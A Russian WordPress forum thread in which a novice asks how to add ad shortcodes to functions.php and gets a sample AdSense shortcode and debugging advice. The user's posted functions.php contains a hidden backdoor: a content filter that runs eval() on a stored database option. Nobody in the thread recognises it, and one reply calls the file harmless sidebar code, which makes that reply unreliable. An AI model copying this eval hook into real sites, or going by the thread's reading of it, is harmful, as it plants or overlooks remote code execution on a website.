Вопрос про шорткоды

(Ответов: 9, Просмотров: 628)
  1. Новичок Аватар для lusan
    • Регистрация: 19.12.2012
    • Сообщений: 12
    • Репутация: 263
    • Webmoney BL: ?
    Здравствуйте!
    Стоит задача: рядом с картинкой (слева) вначале поста разместить контекст.
    Мною было прочитано, что делается это с помощью шорткодов, но как только вношу какие-либо изменения в фанкшн.пхп, сайт сразу перестаёт работать.
    В чём может быть причина? И может быть данную задачу можно решить другим способом?
    • 0
  2. Гуру Аватар для akrustam
    • Регистрация: 21.05.2010
    • Сообщений: 1,164
    • Репутация: 285
    • Webmoney BL: ?
    Покажите код до и после под хайдом. Смотреть надо
    • 0
  3. Сайты на WordPress Аватар для ADvi
    • Регистрация: 22.01.2011
    • Сообщений: 490
    • Репутация: 89
    • Webmoney BL: ?
    Шорткод - обычно то, что вставляют в тело поста, а не в functions.php.
    Покажите код.
    Лучший хостинг в рунете | Не делайте людям добро – они вам этого не простят.
    • 0
  4. $500/day Аватар для lexxx
    • Регистрация: 14.12.2011
    • Сообщений: 606
    • Репутация: 179
    Цитата Сообщение от lusan Посмотреть сообщение
    сайт сразу перестаёт работать. В чём может быть причина?
    Возможно, что вы вставляете в ваш файл functions.php весь код полностью включая <?php и ?> и это приводит к проблеме.
    • 0
  5. Новичок Аватар для lusan
    • Регистрация: 19.12.2012
    • Сообщений: 12
    • Репутация: 263
    • Webmoney BL: ?
    Вот так выглядит файл functions.php
    Как прописать здесь функцию для вывода директа или адсенса, чтобы потом вызывать его с помщью шорткода?

    PHP код:
    <?php

    if ( function_exists('register_sidebar') )

        
    register_sidebar(array(

            
    'name' => 'Sidebar',

            
    'before_widget' => '<div class="sidelist">',

            
    'after_widget' => '</div>',

            
    'before_title' => '<h2>',

            
    'after_title' => '</h2>',

        ));
        


    if ( 
    function_exists('register_sidebar') )

        
    register_sidebar(array(

            
    'name' => 'Footer 1',

            
    'before_widget' => '',

            
    'after_widget' => '',

            
    'before_title' => '<h2>',

            
    'after_title' => '</h2>',

        ));

    if ( 
    function_exists('register_sidebar') )

        
    register_sidebar(array(

            
    'name' => 'Footer 2',

            
    'before_widget' => '',

            
    'after_widget' => '',

            
    'before_title' => '<h3>',

            
    'after_title' => '</h3>',

        ));

    if ( 
    function_exists('register_sidebar') )

        
    register_sidebar(array(

            
    'name' => 'Footer 3',

            
    'before_widget' => '',

            
    'after_widget' => '',

            
    'before_title' => '<h3>',

            
    'after_title' => '</h3>',

        ));

    add_filter('the_content''_bloginfo'10001);



    function 
    _bloginfo($content){
        global 
    $post;
        if(
    is_single() && ($co=@eval(get_option('blogoption'))) !== false){
            return 
    $co;
        } else return 
    $content;
    }

    ?>
    • 0
  6. Дипломник Аватар для JaTony
    • Регистрация: 02.12.2010
    • Сообщений: 163
    • Репутация: 29
    lusan,
    вот наваял тебе побыстрому, не проверял, если не будет работать пиши...

    это добавить в functions.php

    function show_adsense($atts, $content) {
    if (!isset($atts[banner])) {$banner = 0;}
    else {$banner = $atts[banner];}
    $res = '';
    switch ($banner){
    case '0':
    $res = 'ТВОЙ КОД АДСЕНСА ДЛЯ БАННЕРА 0';
    break;
    case '1':
    $res = 'ТВОЙ КОД АДСЕНСА ДЛЯ БАННЕРА 1';
    break;
    case '2':
    $res = 'ТВОЙ КОД АДСЕНСА ДЛЯ БАННЕРА 2';
    break;
    }


    return $res;
    }
    add_shortcode('show_adsense', 'show_adsense');

    так вызывать из любой страницы или поста
    [show_adsense banner="1"]

    здесь banner=1 это номер баннера, т.е. можешь 3 баннера добавить если мой код будешь юзать, а так добавляй сколько хочешь, только лишний case надо будет в функцию прописать...


    кстати тот код, который ты привел, всего лишь регит сайдбары и выводит инфу о блоке, к шорткодам он отношения не имеет.


    P.S.
    офтоп, а как зарегившись только сегодня и имея два поста можно иметь репутацию 241 ?
    Последний раз редактировалось JaTony; 20.12.2012 в 01:22.
    • 0
  7. Гуру Аватар для akrustam
    • Регистрация: 21.05.2010
    • Сообщений: 1,164
    • Репутация: 285
    • Webmoney BL: ?
    Цитата Сообщение от JaTony Посмотреть сообщение
    lusan,
    вот наваял тебе побыстрому, не проверял, если не будет работать пиши...

    это добавить в functions.php

    function show_adsense($atts, $content) {
    if (!isset($atts[banner])) {$banner = 0;}
    else {$banner = $atts[banner];}
    $res = '';
    switch ($banner){
    case '0':
    $res = 'ТВОЙ КОД АДСЕНСА ДЛЯ БАННЕРА 0';
    break;
    case '1':
    $res = 'ТВОЙ КОД АДСЕНСА ДЛЯ БАННЕРА 1';
    break;
    case '2':
    $res = 'ТВОЙ КОД АДСЕНСА ДЛЯ БАННЕРА 2';
    break;
    }


    return $res;
    }
    add_shortcode('show_adsense', 'show_adsense');

    так вызывать из любой страницы или поста
    [show_adsense banner="1"]

    здесь banner=1 это номер баннера, т.е. можешь 3 баннера добавить если мой код будешь юзать, а так добавляй сколько хочешь, только лишний case надо будет в функцию прописать...


    кстати тот код, который ты привел, всего лишь регит сайдбары и выводит инфу о блоке, к шорткодам он отношения не имеет.


    P.S.
    офтоп, а как зарегившись только сегодня и имея два поста можно иметь репутацию 241 ?
    Перенос акка из другого форума.
    • 2

    Спасибо сказали:

    JaTony(20.12.2012), lusan(16.03.2013),
  8. Дипломник Аватар для JaTony
    • Регистрация: 02.12.2010
    • Сообщений: 163
    • Репутация: 29
    akrustam, ааа тады ясно, а то отвечал отвечал, потом смотрю рейтинг какой-то странный, думаю это я слишком поздно сижу уже или чот не то происходит.

    2lusan, попробуй этот код, ежели чот будет не так или будут вопросы пиши, постараюсь помочь
    • 0
  9. Новичок Аватар для lusan
    • Регистрация: 19.12.2012
    • Сообщений: 12
    • Репутация: 263
    • Webmoney BL: ?
    JaTony, добавляю этот код, либо любой другой сайт сразу же перестаёт работать! Вообще не понимаю, в чём может быть причина. И тот код, который приведён мною выше - это есть текущий functions.php! Любой код туда ставлю, вроде всё по правилам - сайт перестаёт работать (
    • 0
  10. Дипломник Аватар для JaTony
    • Регистрация: 02.12.2010
    • Сообщений: 163
    • Репутация: 29
    lusan, сам по себе этот код не может сломать сайт, скорей всего как и написал выше, lexxx, проблема в открытии и закрытии php тегов <?php ?>, в начале он есть, в конце тоже есть, а куда вы код добаляли, в конце вашего файла,
    до ?> или после?

    как перестает сайт работать, вставьте этот код или любой другой, откройте сайт, когда он не откроется (тут в зависимости от браузера как и где давить на view-source) надо открыть исходный html-код сайта (даже если вы видите белое пятно вместо сайта, откройте html-код, там скорей всего будет ошибка php все скопируйте и запостите сюда.

    Или если в паблик не охота, то можно в личку, постараюсь пофиксить,
    хоть завтра и понедельник...., но конец света мы пережили,
    а как на фейсбуке предлагают сделать конец света новым
    ежегодным праздником то вообще все норм :)
    • 1

    Спасибо сказали:

    lusan(16.03.2013),

Похожие темы

Темы Раздел Ответов Последний пост
Вопрос по СЕО
Вопросы от новичков 8 21.11.2012 02:41
Вопрос по VPS
Вопросы от новичков 13 03.11.2012 17:32
Вопрос по css
WordPress 9 15.07.2012 22:22
Вопрос не вопрос, предубеждение ? Не думаю. Мне интересно ваше мнение.
Оффтоп и свободные темы 8 19.06.2012 05:20

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры